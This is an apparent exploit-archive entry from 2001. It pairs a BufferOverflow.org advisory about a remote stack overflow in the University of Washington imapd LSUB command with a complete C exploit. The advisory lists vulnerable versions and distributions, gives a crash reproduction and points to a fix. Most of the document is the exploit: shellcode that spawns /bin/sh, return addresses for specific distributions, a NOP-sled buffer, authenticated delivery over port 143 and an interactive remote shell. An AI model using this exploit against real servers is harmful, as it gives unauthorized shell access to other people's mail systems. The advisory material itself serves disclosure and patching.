A remotely exploitable stack overflow has been discovered in Imapd v12.264 and below in the handling of the lsub command. Since an account is required, mail only users will be able to get shell access. Tested against Slackware 7.0, 7.1, Redhat 6.2, and Conectiva Linux 6.0. Fix available here.
2410c7335840d45d8cc28af5b2e3ca6d01c8dd7c5959b1f0099e67233e56f150
/* Dears Sirs,
We discover a stack overflow in imapd and we send to your site an Advisory
and the exploit for your appreciation.
Best Regards,
Antonio Marcelo
Security Specialist
Bufferoverflow.org
-- BufferOverflow.Org Security Advisory --
-- Date: February/20/2001
Introduction .
The washington´s imapd is the most popular daemon in mail services used
in ISP´s around the Internet world. Developed by Washington´s University
this program is used with many webmail based services.
In a recent session in our labs, our member discover a remote vulnerability
based in Stack overflow method. This bug was detected by our security
specialist Felipe Cerqueira, ( fcerqueira@bufferoverflow.org ), who writes
an remote exploit for the daemon.
Audience .
- Linux / Unix System Administrators;
- Security Specialists;
- Students;
Vulnerable Versions .
-- IMAP4rev1 v12.261
-- IMAP4rev1 v12.264
-- IMAP4rev1 2000.284
Note : We test in these versions only !!!! Possible remote vulnerability
conditions exists in other versions !!!
Testing the Condition .
Telneting your host at port 143 and type the following commands :
* OK localhost IMAP4rev1 v12.261 server ready
1 login felipe felipe
1 OK LOGIN completed
1 lsub "" {1064}
+ Ready for argument
A*1064
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
Linux Distributions with the vulnerable daemon .
-- Slackware 7.0
-- Slackware 7.1
-- RedHat 6.2 Zoot
-- Conectiva Linux 6.0
Not vulnerable Distributions .
-- All distributions data area patched against Stack overflow.
-- Tested in Mandrake Linux, the exploit not worked.
Impact .
Remote access in the server without root, but with UID and GID from user
autheticated in imap server.
Solution .
We sugest the download of new version of IMAP(IMAP200c - 2000.287) that
was corrected the problem.
ftp://ftp.cac.washington.edu/imap
Contact .
-- Felipe Cerqueira Security Specialist of Bufferoverflow.Org
email contact: fcerqueira@bufferoverflow.org
Home Page: www.bufferoverflow.org
Exploit .
-- You can take the source file in
www.bufferoverflow.org/tools.php
*/
/*
* !!! Private !!!
*
* imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others?
Yes!
*
* By: SkyLaZarT ( fcerqueira@bufferoverflow.org ) .aka. Felipe Cerqueira
*
Homepage: www.BufferOverflow.Org
* Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
* Antonio Marcelo and Felipe Saraiva
*
*/
...
/*
* !!! Private !!!
*
* imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes!
*
* By: SkyLaZarT ( fcerqueira@bufferoverflow.org ) .aka. Felipe Cerqueira
* Homepage: www.BufferOverflow.Org
* Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
* Antonio Marcelo and Felipe Saraiva
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define SIZE 1064
#define NOP 0x90
#define RET12261 0xbffff3ec
#define RET12264 0xbffff4e0
#define RET12264ZOOT 0xbffff697
#define RET2000_284 0xbfffebc8
#define INIT(x) bzero(x, sizeof(x))
#define READ(sock,x) read(sock, x, sizeof(x))
#define TIMEOUT 20
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int debug = 0;
void openshell(int sock, int check);
void processSignal(int signum);
void processSignal(int signum) {
fprintf(stderr, "Time out!!\n");
exit(-1);
}
void openshell(int sock, int check) {
char buffer[1024];
fd_set rset;
int i;
while(1) {
FD_ZERO(&rset);
FD_SET(sock, &rset);
FD_SET(fileno(stdin), &rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
if ((i = read(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "Connection terminated!\n");
close(sock);
exit(-1);
} else {
buffer[i] = 0x00;
if(check) {
if (!(strstr(buffer, "uid"))) {
fprintf(stderr, "Exploit failed\n");
exit(-1);
} else {
fprintf(stderr, "Exploit Success!!\n");
check = 0;
}
}
puts(buffer);
}
}
if (FD_ISSET(fileno(stdin), &rset)) {
if ( check ) write(sock, "id\n", 3);
if ((i = read(fileno(stdin), buffer,
sizeof(buffer))) > 0) {
buffer[i] = 0x00;
write(sock, buffer, i);
}
}
}
}
int main(int argc, char **argv) {
char buffer[SIZE], sockbuffer[2048];
char *login, *password;
long retaddr;
struct sockaddr_in sin;
struct hostent *hePtr;
int sock, i;
fprintf(stderr, "\nRemote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284\n"
"Developed by SkyLaZarT - www.BufferOverflow.org\n\n");
if ( argc < 5 ) {
fprintf(stderr, "%s <host> <login> <password> <type> [offset]\n", argv[0]);
fprintf(stderr, "\ttype: [0]\tSlackware 7.0 with IMAP4rev1 v12.261\n"
"\ttype: [1]\tSlackware 7.1 with IMAP4rev1 v12.264\n"
"\ttype: [2]\tRedHat 6.2 ZooT with IMAP4rev1 v12.264\n"
"\ttype: [3]\tSlackware 7.0 with IMAP4rev1 2000.284\n\n");
exit(-1);
}
login = argv[2];
password = argv[3];
switch(atoi(argv[4])) {
case 0: retaddr = RET12261; break;
case 1: retaddr = RET12264; break;
case 2: retaddr = RET12264ZOOT; break;
case 3: retaddr = RET2000_284; break;
default:
fprintf(stderr, "invalid type.. assuming default "
"type 0\n");
retaddr = RET12261; break;
}
if ( argc == 6 )
retaddr += atoi(argv[5]);
signal(SIGALRM, processSignal);
fprintf(stderr, "Trying to exploit %s...\n", argv[1]);
fprintf(stderr, "Using return address 0x%08lx. Shellcode size: %i bytes\n\n", retaddr, strlen(shellcode));
alarm(TIMEOUT);
hePtr = gethostbyname(argv[1]);
if (!hePtr) {
fprintf(stderr, "Unknow hostname : %s\n", strerror(errno));
exit(-1);
}
alarm(0);
sock = socket(AF_INET, SOCK_STREAM, 0);
if ( sock < 0 ) {
perror("socket()");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(143);
memcpy(&sin.sin_addr, hePtr->h_addr, hePtr->h_length);
bzero(&(sin.sin_zero), 8);
fprintf(stderr, "Connecting... ");
alarm(TIMEOUT);
if ( connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0 ) {
fprintf(stderr, "failed to %s:143\n", argv[1]);
exit(-1);
}
alarm(0);
fprintf(stderr, "OK\n");
for ( i = 0; i <= SIZE; i += 4 )
*(long *)&buffer[i] = retaddr;
for ( i = 0; i < ( SIZE - strlen(shellcode) - 100); i++ )
*(buffer+i) = NOP;
memcpy(buffer + i, shellcode, strlen(shellcode));
INIT(sockbuffer);
READ(sock, sockbuffer);
if(debug) fprintf(stderr, "debug %s", sockbuffer);
fprintf(stderr, "Trying to loging ... ");
sprintf(sockbuffer, "1 LOGIN %s %s\n", login, password);
write(sock, sockbuffer, strlen(sockbuffer));
INIT(sockbuffer);
READ(sock, sockbuffer);
if(debug) fprintf(stderr, "debug %s", sockbuffer);
if (!(strstr(sockbuffer, "OK LOGIN completed"))) {
fprintf(stderr, "Login failed!!\n");
close(sock);
exit(-1);
}
fprintf(stderr, "OK\n");
INIT(sockbuffer);
sprintf(sockbuffer, "1 LSUB \"\" {1064}\r\n");
write(sock, sockbuffer, strlen(sockbuffer));
INIT(sockbuffer);
READ(sock, sockbuffer);
if(debug) fprintf(stderr, "debug %s", sockbuffer);
if(!(strstr(sockbuffer, "Ready"))) {
fprintf(stderr, "LSUB command failed\n");
close(sock);
exit(-1);
}
fprintf(stderr, "Sending shellcode... ");
write(sock, buffer, 1064);
write(sock, "\r\n", 2);
fprintf(stderr, "OK\n");
fprintf(stderr, "PRESS ENTER for exploit status!!\n\n");
openshell(sock, 1);
close(sock);
return 0;
}